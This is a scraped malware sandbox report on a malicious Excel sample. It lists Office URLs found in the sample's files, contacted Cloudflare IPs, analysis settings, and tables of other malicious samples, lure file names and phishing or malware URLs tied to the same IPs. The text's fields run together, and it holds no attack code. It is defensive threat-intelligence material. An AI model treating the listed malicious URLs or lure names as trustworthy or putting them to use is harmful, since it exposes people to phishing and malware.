                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                            high
                                                            https://graph.windows.net617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/ios617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmedia617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/Activities617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.net617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                      • 0%, Virustotal, Browse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policies617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocation617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/log617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorize617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/imports617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/mac617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devices617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorize617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.com617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2617A6017-3014-4CF5-A8EA-F75B714BAAF0.0.drfalse
                                                                                                                                                        high

                                                                                                                                                        Contacted IPs

                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                        Public

                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                        172.67.221.76
                                                                                                                                                        unknownUnited States
                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                        104.27.172.15
                                                                                                                                                        unknownUnited States
                                                                                                                                                        13335CLOUDFLARENETUSfalse

                                                                                                                                                        General Information

                                                                                                                                                        Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                        Analysis ID:320290
                                                                                                                                                        Start date:19.11.2020
                                                                                                                                                        Start time:08:54:17
                                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                                        Overall analysis duration:0h 13m 43s
                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                        Report type:full
                                                                                                                                                        Sample file name:doc2227740.xls
                                                                                                                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                        Run name:Potential for more IOCs and behavior
                                                                                                                                                        Number of analysed new started processes analysed:36
                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                        Technologies:
                                                                                                                                                        • HCA enabled
                                                                                                                                                        • EGA enabled
                                                                                                                                                        • HDC enabled
                                                                                                                                                        • AMSI enabled
                                                                                                                                                        Analysis Mode:default
                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                        Detection:MAL
                                                                                                                                                        Classification:mal52.evad.winXLS@3/10@2/2
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Adjust boot time
                                                                                                                                                        • Enable AMSI
                                                                                                                                                        • Found application associated with file extension: .xls
                                                                                                                                                        • Changed system and user locale, location and keyboard layout to English - United States
                                                                                                                                                        Warnings:
                                                                                                                                                        Show All
                                                                                                                                                        • Max analysis timeout: 720s exceeded, the analysis took too long
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WinStore.App.exe, RuntimeBroker.exe, backgroundTaskHost.exe, ApplicationFrameHost.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, WMIADAP.exe, MusNotifyIcon.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.193.48, 52.109.88.8, 52.109.12.21, 52.109.88.39, 40.88.32.150, 23.54.113.104, 51.104.144.132, 13.88.21.125, 23.0.174.185, 23.0.174.200, 51.103.5.159, 52.155.217.156, 52.147.198.201, 20.54.26.129, 23.10.249.26, 23.10.249.43, 51.11.168.160, 13.104.215.69, 13.104.215.72, 40.90.23.154, 40.90.23.208, 40.90.23.206, 40.90.137.124, 40.90.137.126, 40.90.23.153, 93.184.220.29, 40.127.240.158, 20.49.150.241, 23.54.113.45
                                                                                                                                                        • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, fs-wildcard.microsoft.com.edgekey.net, wns.notify.windows.com.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, login.live.com, audownload.windowsupdate.nsatc.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, europe.configsvc1.live.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, par02p.wns.notify.windows.com.akadns.net, blu-main-ips-v4only.a.lg.prod.aadmsa.trafficmanager.net, emea1.notify.windows.com.akadns.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, login.msa.msidentity.com, skypedataprdcoleus16.cloudapp.net, config.officeapps.live.com, settingsfd-prod-neu1-endpoint.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net
                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                        Simulations

                                                                                                                                                        Behavior and APIs

                                                                                                                                                        No simulations

                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                        IPs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                        172.67.221.76d11311145.xlsGet hashmaliciousBrowse

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          sherpa.restd11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15

                                                                                                                                                          ASN

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          CLOUDFLARENETUSPO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                                          • 104.20.23.46
                                                                                                                                                          doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.18.57.249
                                                                                                                                                          d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.23.99.190
                                                                                                                                                          d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.23.98.190
                                                                                                                                                          PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.159.134.233
                                                                                                                                                          07DYwxlVm4.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.159.133.233
                                                                                                                                                          af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.comGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.38.66
                                                                                                                                                          e2b97ee03b4b38578f04d0cc93d8effd.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1Get hashmaliciousBrowse
                                                                                                                                                          • 104.17.234.61
                                                                                                                                                          https://msgcash.com/click/NzhlMWY1MTltNzg3NS00ZDFmLTk1YmQtODZiZGQ3MzQwZGMzGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.181.196
                                                                                                                                                          bGtm3bQKUj.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.24.126.89
                                                                                                                                                          Https://christinescom.github.io/cappdevs/ta.html?bbre=dsiw4risdGet hashmaliciousBrowse
                                                                                                                                                          • 104.16.19.94
                                                                                                                                                          https://olhonabrasa.com.br/secure/zimbra/access/zimbra/index.phpGet hashmaliciousBrowse
                                                                                                                                                          • 104.17.201.204
                                                                                                                                                          https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                                                                                                                                          • 104.16.18.94
                                                                                                                                                          CLOUDFLARENETUSPO Quotation.jarGet hashmaliciousBrowse
                                                                                                                                                          • 104.20.23.46
                                                                                                                                                          doc2227740.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          TRIAL-ORDER.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.18.57.249
                                                                                                                                                          d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          23692 ANRITSU PROBE po 29288.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.23.99.190
                                                                                                                                                          d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.173.15
                                                                                                                                                          PO #5618896.gz.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.23.98.190
                                                                                                                                                          PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.159.134.233
                                                                                                                                                          07DYwxlVm4.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          9Pimjl3jyq.exeGet hashmaliciousBrowse
                                                                                                                                                          • 162.159.133.233
                                                                                                                                                          af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.comGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.38.66
                                                                                                                                                          e2b97ee03b4b38578f04d0cc93d8effd.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.133.115
                                                                                                                                                          https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1Get hashmaliciousBrowse
                                                                                                                                                          • 104.17.234.61
                                                                                                                                                          https://msgcash.com/click/NzhlMWY1MTltNzg3NS00ZDFmLTk1YmQtODZiZGQ3MzQwZGMzGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.181.196
                                                                                                                                                          bGtm3bQKUj.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.24.126.89
                                                                                                                                                          Https://christinescom.github.io/cappdevs/ta.html?bbre=dsiw4risdGet hashmaliciousBrowse
                                                                                                                                                          • 104.16.19.94
                                                                                                                                                          https://olhonabrasa.com.br/secure/zimbra/access/zimbra/index.phpGet hashmaliciousBrowse
                                                                                                                                                          • 104.17.201.204
                                                                                                                                                          https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                                                                                                                                          • 104.16.18.94

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                          ce5f3254611a8c095a3d821d44539877d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          af4db3a6b648b585f8e11b9ff5be73f2.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          WSGaRIW.dllGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).jsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          ddos________ (IW0Irt2zSey6D6LMEgcs2kqQiSuMa 8 G).jsGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          e2b97ee03b4b38578f04d0cc93d8effd.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          MIT-MULTA5600415258.msiGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          Q4Esp4M8dM.msiGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          WOHSFR01BZAC6VP3YOYSGIHL92J4B0XM50RJR34.dllGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          #U007e370531.dllGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          WSGaRIW.dllGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          ad2b6de5fb2ee29b62d3a71195beffd1.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          C51sYmlcZU.dllGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          MhgKT501bC.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          SecuriteInfo.com.Trojan.PWS.Siggen2.59718.4609.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          45g7l63ZII.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          qTgBzp3G6n.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          35xLEdpG78.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          start.exeGet hashmaliciousBrowse
                                                                                                                                                          • 104.27.172.15
                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19d11311145.xlsGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          Original Shipment Document.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          PO#0007507_009389283882873PDF.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          MV GRAN LOBO 008.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          http://www.ericbess.com/ericblog/2008/03/03/wp-codebox/#examplesGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://app.archbee.io/doc/wjFBJ1IQgNqcYtxyaUfi5/V9dqJTS3iO58EgXIT7wr1Get hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://lfonoumkgl.zizera.com/FXGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACH WlRE PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://view.publitas.com/ipinsurance/demers-beaulne-inc/Get hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACH - WlRE PAYMENT REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://t.co/DmCKxDTz1SGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          http://customer.cartech.com/inventory_manufacturing.cfmGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACHWlRE REMlTTANCE ADVlCE..xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://www.canva.com/design/DAEN4Gk1aAs/uErgK6sn3gPozGMXWtYgqA/view?utm_content=DAEN4Gk1aAs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          win_encryptor.exeGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACH WlRE REMlTTANCE PAYMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://www.google.com/url?q=https://sedgefuneralplan.com/pinafore.php&sa=D&ust=1605725146740000&usg=AOvVaw1JCRUh1siinDauICG91nF3Get hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          https://bxjg2oj292.zizera.com/F00929377Get hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76
                                                                                                                                                          ACH & WlRE REMlTTANCE.xlsxGet hashmaliciousBrowse
                                                                                                                                                          • 172.67.221.76

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):626709
                                                                                                                                                          Entropy (8bit):0.5031071884738996
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5IJC48SFq/fZ0jGB5bQYLWtwtZ1IV+hVZO4FAvWGTHi5hF:6C4HEZLUht/2iTH+X
                                                                                                                                                          MD5:F76279857E6EEF0A400CDC66D4481273
